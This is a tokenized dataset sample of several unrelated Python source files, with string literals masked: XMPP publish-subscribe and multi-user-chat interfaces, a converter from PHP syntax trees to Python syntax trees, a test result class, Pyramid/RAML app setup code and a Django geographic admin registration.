<EOL> def publish ( requestor , service , nodeIdentifier , items ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( requestor , service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( requestor , service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def subscriptions ( requestor , service ) : <EOL> """<STR_LIT>""" <EOL> def affiliations ( requestor , service ) : <EOL> """<STR_LIT>""" <EOL> def create ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getConfigurationOptions ( ) : <EOL> """<STR_LIT>""" <EOL> def getDefaultConfiguration ( requestor , service , nodeType ) : <EOL> """<STR_LIT>""" <EOL> def getConfiguration ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def setConfiguration ( requestor , service , nodeIdentifier , options ) : <EOL> """<STR_LIT>""" <EOL> def items ( requestor , service , nodeIdentifier , maxItems , itemIdentifiers ) : <EOL> """<STR_LIT>""" <EOL> def retract ( requestor , service , nodeIdentifier , itemIdentifiers ) : <EOL> """<STR_LIT>""" <EOL> def purge ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def delete ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubResource ( Interface ) : <EOL> def locateResource ( request ) : <EOL> """<STR_LIT>""" <EOL> def getInfo ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getNodes ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getConfigurationOptions ( ) : <EOL> """<STR_LIT>""" <EOL> def publish ( request ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( request ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( request ) : <EOL> """<STR_LIT>""" <EOL> def subscriptions ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliations ( request ) : <EOL> """<STR_LIT>""" <EOL> def create ( request ) : <EOL> """<STR_LIT>""" <EOL> def default ( request ) : <EOL> """<STR_LIT>""" <EOL> def configureGet ( request ) 
: <EOL> """<STR_LIT>""" <EOL> def configureSet ( request ) : <EOL> """<STR_LIT>""" <EOL> def items ( request ) : <EOL> """<STR_LIT>""" <EOL> def retract ( request ) : <EOL> """<STR_LIT>""" <EOL> def purge ( request ) : <EOL> """<STR_LIT>""" <EOL> def delete ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliationsGet ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliationsSet ( request ) : <EOL> """<STR_LIT>""" <EOL> class IMUCClient ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def receivedSubject ( room , user , subject ) : <EOL> """<STR_LIT>""" <EOL> def receivedHistory ( room , user , message ) : <EOL> """<STR_LIT>""" <EOL> def configure ( roomJID , options ) : <EOL> """<STR_LIT>""" <EOL> def getConfiguration ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def join ( roomJID , nick , historyOptions = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> def nick ( roomJID , nick ) : <EOL> """<STR_LIT>""" <EOL> def leave ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def userJoinedRoom ( room , user ) : <EOL> """<STR_LIT>""" <EOL> def groupChat ( roomJID , body ) : <EOL> """<STR_LIT>""" <EOL> def chat ( occupantJID , body ) : <EOL> """<STR_LIT>""" <EOL> def register ( roomJID , options ) : <EOL> """<STR_LIT>""" <EOL> def subject ( roomJID , subject ) : <EOL> """<STR_LIT>""" <EOL> def voice ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def history ( roomJID , messages ) : <EOL> """<STR_LIT>""" <EOL> def ban ( roomJID , entity , reason = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> def kick ( roomJID , nick , reason = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> class IMUCStatuses ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def __contains__ ( key ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( ) : <EOL> """<STR_LIT>""" <EOL> def __len__ ( ) : <EOL> """<STR_LIT>""" </s>
<s> import phpast as php <EOL> import ast as py <EOL> unary_ops = { <EOL> '<STR_LIT>' : py . Invert , <EOL> '<STR_LIT:!>' : py . Not , <EOL> '<STR_LIT:+>' : py . UAdd , <EOL> '<STR_LIT:->' : py . USub , <EOL> } <EOL> bool_ops = { <EOL> '<STR_LIT>' : py . And , <EOL> '<STR_LIT>' : py . Or , <EOL> '<STR_LIT>' : py . And , <EOL> '<STR_LIT>' : py . Or , <EOL> } <EOL> cmp_ops = { <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT:<>' : py . Lt , <EOL> '<STR_LIT>' : py . LtE , <EOL> '<STR_LIT>' : py . Eq , <EOL> '<STR_LIT>' : py . Eq , <EOL> '<STR_LIT:>>' : py . Gt , <EOL> '<STR_LIT>' : py . GtE , <EOL> } <EOL> binary_ops = { <EOL> '<STR_LIT:+>' : py . Add , <EOL> '<STR_LIT:->' : py . Sub , <EOL> '<STR_LIT:*>' : py . Mult , <EOL> '<STR_LIT:/>' : py . Div , <EOL> '<STR_LIT:%>' : py . Mod , <EOL> '<STR_LIT>' : py . LShift , <EOL> '<STR_LIT>' : py . RShift , <EOL> '<STR_LIT:|>' : py . BitOr , <EOL> '<STR_LIT:&>' : py . BitAnd , <EOL> '<STR_LIT>' : py . BitXor , <EOL> } <EOL> casts = { <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT:string>' : '<STR_LIT:str>' , <EOL> '<STR_LIT>' : '<STR_LIT:list>' , <EOL> } <EOL> def to_stmt ( pynode ) : <EOL> if not isinstance ( pynode , py . stmt ) : <EOL> pynode = py . Expr ( pynode , <EOL> lineno = pynode . lineno , <EOL> col_offset = pynode . col_offset ) <EOL> return pynode <EOL> def from_phpast ( node ) : <EOL> if node is None : <EOL> return py . Pass ( ** pos ( node ) ) <EOL> if isinstance ( node , basestring ) : <EOL> return py . Str ( node , ** pos ( node ) ) <EOL> if isinstance ( node , ( int , float ) ) : <EOL> return py . Num ( node , ** pos ( node ) ) <EOL> if isinstance ( node , php . Array ) : <EOL> if node . nodes : <EOL> if node . nodes [ <NUM_LIT:0> ] . key is not None : <EOL> keys = [ ] <EOL> values = [ ] <EOL> for elem in node . nodes : <EOL> keys . append ( from_phpast ( elem . key ) ) <EOL> values . append ( from_phpast ( elem . 
value ) ) <EOL> return py . Dict ( keys , values , ** pos ( node ) ) <EOL> else : <EOL> return py . List ( [ from_phpast ( x . value ) for x in node . nodes ] , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> return py . List ( [ ] , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . InlineHTML ) : <EOL> args = [ py . Str ( node . data , ** pos ( node ) ) ] <EOL> return py . Call ( py . Name ( '<STR_LIT>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , [ ] , None , None , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Echo ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> map ( from_phpast , node . nodes ) , <EOL> [ ] , None , None , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Print ) : <EOL> return py . Print ( None , [ from_phpast ( node . node ) ] , True , ** pos ( node ) ) <EOL> if isinstance ( node , php . Exit ) : <EOL> args = [ ] <EOL> if node . expr is not None : <EOL> args . append ( from_phpast ( node . expr ) ) <EOL> return py . Raise ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , [ ] , None , None , ** pos ( node ) ) , <EOL> None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Return ) : <EOL> if node . node is None : <EOL> return py . Return ( None , ** pos ( node ) ) <EOL> else : <EOL> return py . Return ( from_phpast ( node . node ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Break ) : <EOL> assert node . node is None , '<STR_LIT>' <EOL> return py . Break ( ** pos ( node ) ) <EOL> if isinstance ( node , php . Continue ) : <EOL> assert node . node is None , '<STR_LIT>' <EOL> return py . Continue ( ** pos ( node ) ) <EOL> if isinstance ( node , php . Silence ) : <EOL> return from_phpast ( node . expr ) <EOL> if isinstance ( node , php . 
Block ) : <EOL> return from_phpast ( php . If ( <NUM_LIT:1> , node , [ ] , None , lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Unset ) : <EOL> return py . Delete ( map ( from_phpast , node . nodes ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . IsSet ) and len ( node . nodes ) == <NUM_LIT:1> : <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ArrayOffset ) : <EOL> return py . Compare ( from_phpast ( node . nodes [ <NUM_LIT:0> ] . expr ) , <EOL> [ py . In ( ** pos ( node ) ) ] , <EOL> [ from_phpast ( node . nodes [ <NUM_LIT:0> ] . node ) ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ObjectProperty ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . nodes [ <NUM_LIT:0> ] . node ) , <EOL> from_phpast ( node . nodes [ <NUM_LIT:0> ] . name ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . Variable ) : <EOL> return py . Compare ( py . Str ( node . nodes [ <NUM_LIT:0> ] . name [ <NUM_LIT:1> : ] , ** pos ( node ) ) , <EOL> [ py . In ( ** pos ( node ) ) ] , <EOL> [ py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ ] , [ ] , None , None , ** pos ( node ) ) ] , <EOL> ** pos ( node ) ) <EOL> return py . Compare ( from_phpast ( node . nodes [ <NUM_LIT:0> ] ) , <EOL> [ py . IsNot ( ** pos ( node ) ) ] , <EOL> [ py . Name ( '<STR_LIT:None>' , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Empty ) : <EOL> return from_phpast ( php . UnaryOp ( '<STR_LIT:!>' , <EOL> php . BinaryOp ( '<STR_LIT>' , <EOL> php . IsSet ( [ node . expr ] , <EOL> lineno = node . lineno ) , <EOL> node . expr , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Assignment ) : <EOL> if ( isinstance ( node . node , php . 
ArrayOffset ) <EOL> and node . node . expr is None ) : <EOL> return py . Call ( py . Attribute ( from_phpast ( node . node . node ) , <EOL> '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if ( isinstance ( node . node , php . ObjectProperty ) <EOL> and isinstance ( node . node . name , php . BinaryOp ) ) : <EOL> return to_stmt ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . node . node ) , <EOL> from_phpast ( node . node . name ) , <EOL> from_phpast ( node . expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) ) <EOL> return py . Assign ( [ store ( from_phpast ( node . node ) ) ] , <EOL> from_phpast ( node . expr ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . ListAssignment ) : <EOL> return py . Assign ( [ py . Tuple ( map ( store , map ( from_phpast , node . nodes ) ) , <EOL> py . Store ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ] , <EOL> from_phpast ( node . expr ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . AssignOp ) : <EOL> return from_phpast ( php . Assignment ( node . left , <EOL> php . BinaryOp ( node . op [ : - <NUM_LIT:1> ] , <EOL> node . left , <EOL> node . right , <EOL> lineno = node . lineno ) , <EOL> False , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , ( php . PreIncDecOp , php . PostIncDecOp ) ) : <EOL> return from_phpast ( php . Assignment ( node . expr , <EOL> php . BinaryOp ( node . op [ <NUM_LIT:0> ] , <EOL> node . expr , <EOL> <NUM_LIT:1> , <EOL> lineno = node . lineno ) , <EOL> False , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . ArrayOffset ) : <EOL> return py . Subscript ( from_phpast ( node . node ) , <EOL> py . Index ( from_phpast ( node . expr ) , ** pos ( node ) ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . 
ObjectProperty ) : <EOL> if isinstance ( node . name , ( php . Variable , php . BinaryOp ) ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . node ) , <EOL> from_phpast ( node . name ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> return py . Attribute ( from_phpast ( node . node ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Constant ) : <EOL> name = node . name <EOL> if name . lower ( ) == '<STR_LIT:true>' : name = '<STR_LIT:True>' <EOL> if name . lower ( ) == '<STR_LIT:false>' : name = '<STR_LIT:False>' <EOL> if name . lower ( ) == '<STR_LIT:null>' : name = '<STR_LIT:None>' <EOL> return py . Name ( name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Variable ) : <EOL> name = node . name [ <NUM_LIT:1> : ] <EOL> if name == '<STR_LIT>' : name = '<STR_LIT>' <EOL> return py . Name ( name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Global ) : <EOL> return py . Global ( [ var . name [ <NUM_LIT:1> : ] for var in node . nodes ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . Include ) : <EOL> once = py . Name ( '<STR_LIT:True>' if node . once else '<STR_LIT:False>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) , once ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Require ) : <EOL> once = py . Name ( '<STR_LIT:True>' if node . once else '<STR_LIT:False>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . 
expr ) , once ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . UnaryOp ) : <EOL> op = unary_ops . get ( node . op ) <EOL> assert op is not None , "<STR_LIT>" % node . op <EOL> op = op ( ** pos ( node ) ) <EOL> return py . UnaryOp ( op , from_phpast ( node . expr ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . BinaryOp ) : <EOL> if node . op == '<STR_LIT:.>' : <EOL> pattern , pieces = build_format ( node . left , node . right ) <EOL> if pieces : <EOL> return py . BinOp ( py . Str ( pattern , ** pos ( node ) ) , <EOL> py . Mod ( ** pos ( node ) ) , <EOL> py . Tuple ( map ( from_phpast , pieces ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> return py . Str ( pattern % ( ) , ** pos ( node ) ) <EOL> if node . op in bool_ops : <EOL> op = bool_ops [ node . op ] ( ** pos ( node ) ) <EOL> return py . BoolOp ( op , [ from_phpast ( node . left ) , <EOL> from_phpast ( node . right ) ] , ** pos ( node ) ) <EOL> if node . op in cmp_ops : <EOL> op = cmp_ops [ node . op ] ( ** pos ( node ) ) <EOL> return py . Compare ( from_phpast ( node . left ) , [ op ] , <EOL> [ from_phpast ( node . right ) ] , <EOL> ** pos ( node ) ) <EOL> op = binary_ops . get ( node . op ) <EOL> assert op is not None , "<STR_LIT>" % node . op <EOL> op = op ( ** pos ( node ) ) <EOL> return py . BinOp ( from_phpast ( node . left ) , <EOL> op , <EOL> from_phpast ( node . right ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . TernaryOp ) : <EOL> return py . IfExp ( from_phpast ( node . expr ) , <EOL> from_phpast ( node . iftrue ) , <EOL> from_phpast ( node . iffalse ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Cast ) : <EOL> return py . Call ( py . Name ( casts . get ( node . type , node . type ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . 
expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . If ) : <EOL> orelse = [ ] <EOL> if node . else_ : <EOL> for else_ in map ( from_phpast , deblock ( node . else_ . node ) ) : <EOL> orelse . append ( to_stmt ( else_ ) ) <EOL> for elseif in reversed ( node . elseifs ) : <EOL> orelse = [ py . If ( from_phpast ( elseif . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( elseif . node ) ) ) , <EOL> orelse , ** pos ( node ) ) ] <EOL> return py . If ( from_phpast ( node . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( node . node ) ) ) , <EOL> orelse , ** pos ( node ) ) <EOL> if isinstance ( node , php . For ) : <EOL> assert node . test is None or len ( node . test ) == <NUM_LIT:1> , '<STR_LIT>' <EOL> return from_phpast ( php . Block ( ( node . start or [ ] ) <EOL> + [ php . While ( node . test [ <NUM_LIT:0> ] if node . test else <NUM_LIT:1> , <EOL> php . Block ( deblock ( node . node ) <EOL> + ( node . count or [ ] ) , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ] , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Foreach ) : <EOL> if node . keyvar is None : <EOL> target = py . Name ( node . valvar . name [ <NUM_LIT:1> : ] , py . Store ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> target = py . Tuple ( [ py . Name ( node . keyvar . name [ <NUM_LIT:1> : ] , <EOL> py . Store ( ** pos ( node ) ) ) , <EOL> py . Name ( node . valvar . name [ <NUM_LIT:1> : ] , <EOL> py . Store ( ** pos ( node ) ) ) ] , <EOL> py . Store ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> return py . For ( target , from_phpast ( node . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( node . node ) ) ) , <EOL> [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . While ) : <EOL> return py . While ( from_phpast ( node . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( node . node ) ) ) , <EOL> [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . 
DoWhile ) : <EOL> condition = php . If ( php . UnaryOp ( '<STR_LIT:!>' , node . expr , lineno = node . lineno ) , <EOL> php . Break ( None , lineno = node . lineno ) , <EOL> [ ] , None , lineno = node . lineno ) <EOL> return from_phpast ( php . While ( <NUM_LIT:1> , <EOL> php . Block ( deblock ( node . node ) <EOL> + [ condition ] , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Try ) : <EOL> return py . TryExcept ( map ( to_stmt , map ( from_phpast , node . nodes ) ) , <EOL> [ py . ExceptHandler ( py . Name ( catch . class_ , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> store ( from_phpast ( catch . var ) ) , <EOL> map ( to_stmt , map ( from_phpast , catch . nodes ) ) , <EOL> ** pos ( node ) ) <EOL> for catch in node . catches ] , <EOL> [ ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Throw ) : <EOL> return py . Raise ( from_phpast ( node . node ) , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Function ) : <EOL> args = [ ] <EOL> defaults = [ ] <EOL> for param in node . params : <EOL> args . append ( py . Name ( param . name [ <NUM_LIT:1> : ] , <EOL> py . Param ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> if param . default is not None : <EOL> defaults . append ( from_phpast ( param . default ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . FunctionDef ( node . name , <EOL> py . arguments ( args , None , None , defaults ) , <EOL> body , [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . Method ) : <EOL> args = [ ] <EOL> defaults = [ ] <EOL> decorator_list = [ ] <EOL> if '<STR_LIT>' in node . modifiers : <EOL> decorator_list . append ( py . Name ( '<STR_LIT>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> args . append ( py . Name ( '<STR_LIT>' , py . 
Param ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> else : <EOL> args . append ( py . Name ( '<STR_LIT>' , py . Param ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> for param in node . params : <EOL> args . append ( py . Name ( param . name [ <NUM_LIT:1> : ] , <EOL> py . Param ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ) <EOL> if param . default is not None : <EOL> defaults . append ( from_phpast ( param . default ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . FunctionDef ( node . name , <EOL> py . arguments ( args , None , None , defaults ) , <EOL> body , decorator_list , ** pos ( node ) ) <EOL> if isinstance ( node , php . Class ) : <EOL> name = node . name <EOL> bases = [ ] <EOL> extends = node . extends or '<STR_LIT:object>' <EOL> bases . append ( py . Name ( extends , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) ) <EOL> body = map ( to_stmt , map ( from_phpast , node . nodes ) ) <EOL> for stmt in body : <EOL> if ( isinstance ( stmt , py . FunctionDef ) <EOL> and stmt . name in ( name , '<STR_LIT>' ) ) : <EOL> stmt . name = '<STR_LIT>' <EOL> if not body : body = [ py . Pass ( ** pos ( node ) ) ] <EOL> return py . ClassDef ( name , bases , body , [ ] , ** pos ( node ) ) <EOL> if isinstance ( node , ( php . ClassConstants , php . ClassVariables ) ) : <EOL> assert len ( node . nodes ) == <NUM_LIT:1> , '<STR_LIT>' <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ClassConstant ) : <EOL> name = php . Constant ( node . nodes [ <NUM_LIT:0> ] . name , lineno = node . lineno ) <EOL> else : <EOL> name = php . Variable ( node . nodes [ <NUM_LIT:0> ] . name , lineno = node . lineno ) <EOL> initial = node . nodes [ <NUM_LIT:0> ] . initial <EOL> if initial is None : <EOL> initial = php . Constant ( '<STR_LIT:None>' , lineno = node . lineno ) <EOL> return py . 
Assign ( [ store ( from_phpast ( name ) ) ] , <EOL> from_phpast ( initial ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , ( php . FunctionCall , php . New ) ) : <EOL> if isinstance ( node . name , basestring ) : <EOL> name = py . Name ( node . name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> else : <EOL> name = py . Subscript ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ ] , [ ] , None , None , ** pos ( node ) ) , <EOL> py . Index ( from_phpast ( node . name ) , ** pos ( node ) ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( name , args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . MethodCall ) : <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( py . Attribute ( from_phpast ( node . node ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . StaticMethodCall ) : <EOL> class_ = node . class_ <EOL> if class_ == '<STR_LIT>' : class_ = '<STR_LIT>' <EOL> args , kwargs = build_args ( node . params ) <EOL> return py . Call ( py . Attribute ( py . Name ( class_ , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , kwargs , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . StaticProperty ) : <EOL> class_ = node . node <EOL> name = node . name <EOL> if isinstance ( name , php . Variable ) : <EOL> name = name . name [ <NUM_LIT:1> : ] <EOL> return py . Attribute ( py . Name ( class_ , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . 
Load ( ** pos ( node ) ) , ** pos ( node ) ) , <EOL> [ py . Str ( str ( node ) , ** pos ( node ) ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> def pos ( node ) : <EOL> return { '<STR_LIT>' : getattr ( node , '<STR_LIT>' , <NUM_LIT:0> ) , '<STR_LIT>' : <NUM_LIT:0> } <EOL> def store ( name ) : <EOL> name . ctx = py . Store ( ** pos ( name ) ) <EOL> return name <EOL> def deblock ( node ) : <EOL> if isinstance ( node , php . Block ) : <EOL> return node . nodes <EOL> else : <EOL> return [ node ] <EOL> def build_args ( params ) : <EOL> args = [ ] <EOL> kwargs = [ ] <EOL> for param in params : <EOL> node = from_phpast ( param . node ) <EOL> if isinstance ( node , py . Assign ) : <EOL> kwargs . append ( py . keyword ( node . targets [ <NUM_LIT:0> ] . id , node . value ) ) <EOL> else : <EOL> args . append ( node ) <EOL> return args , kwargs <EOL> def build_format ( left , right ) : <EOL> if isinstance ( left , basestring ) : <EOL> pattern , pieces = left . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) , [ ] <EOL> elif isinstance ( left , php . BinaryOp ) and left . op == '<STR_LIT:.>' : <EOL> pattern , pieces = build_format ( left . left , left . right ) <EOL> else : <EOL> pattern , pieces = '<STR_LIT:%s>' , [ left ] <EOL> if isinstance ( right , basestring ) : <EOL> pattern += right . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) <EOL> else : <EOL> pattern += '<STR_LIT:%s>' <EOL> pieces . append ( right ) <EOL> return pattern , pieces </s>
<s> class Result ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . __dict__ . update ( kwargs ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . className , self . name , self . status ) <EOL> def __repr__ ( self ) : <EOL> module_name = self . __class__ . __module__ <EOL> class_name = self . __class__ . __name__ <EOL> self_str = str ( self ) <EOL> return "<STR_LIT>" % ( module_name , class_name , self_str ) <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . className , self . name ) </s>
<s> from nefertari . utils . data import * <EOL> from nefertari . utils . dictset import * <EOL> from nefertari . utils . utils import * <EOL> _split = split_strip </s>
<s> import logging <EOL> import ramlfications <EOL> from nefertari . acl import RootACL as NefertariRootACL <EOL> from nefertari . utils import dictset <EOL> log = logging . getLogger ( __name__ ) <EOL> def includeme ( config ) : <EOL> from . generators import generate_server , generate_models <EOL> Settings = dictset ( config . registry . settings ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . registry . database_acls = Settings . asbool ( '<STR_LIT>' ) <EOL> if config . registry . database_acls : <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> config . include ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> if Settings . asbool ( '<STR_LIT>' ) : <EOL> config . add_tween ( '<STR_LIT>' ) <EOL> config . root_factory = NefertariRootACL <EOL> root = config . get_root_resource ( ) <EOL> root_auth = getattr ( root , '<STR_LIT>' , False ) <EOL> log . info ( '<STR_LIT>' ) <EOL> raml_root = ramlfications . parse ( Settings [ '<STR_LIT>' ] ) <EOL> log . info ( '<STR_LIT>' ) <EOL> generate_models ( config , raml_resources = raml_root . resources ) <EOL> if root_auth : <EOL> from . auth import setup_auth_policies , get_authuser_model <EOL> if getattr ( config . registry , '<STR_LIT>' , None ) is None : <EOL> config . registry . auth_model = get_authuser_model ( ) <EOL> setup_auth_policies ( config , raml_root ) <EOL> config . include ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' ) <EOL> generate_server ( raml_root , config ) <EOL> log . info ( '<STR_LIT>' ) <EOL> from nefertari . engine import setup_database <EOL> setup_database ( config ) <EOL> from nefertari . elasticsearch import ES <EOL> ES . setup_mappings ( ) <EOL> if root_auth : <EOL> config . 
include ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' ) </s>
<s> from django . contrib . gis import admin <EOL> from models import Geoname <EOL> class GeonameAdmin ( admin . OSMGeoAdmin ) : <EOL> search_fields = ( '<STR_LIT:name>' , ) <EOL> admin . site . register ( Geoname , GeonameAdmin ) </s>
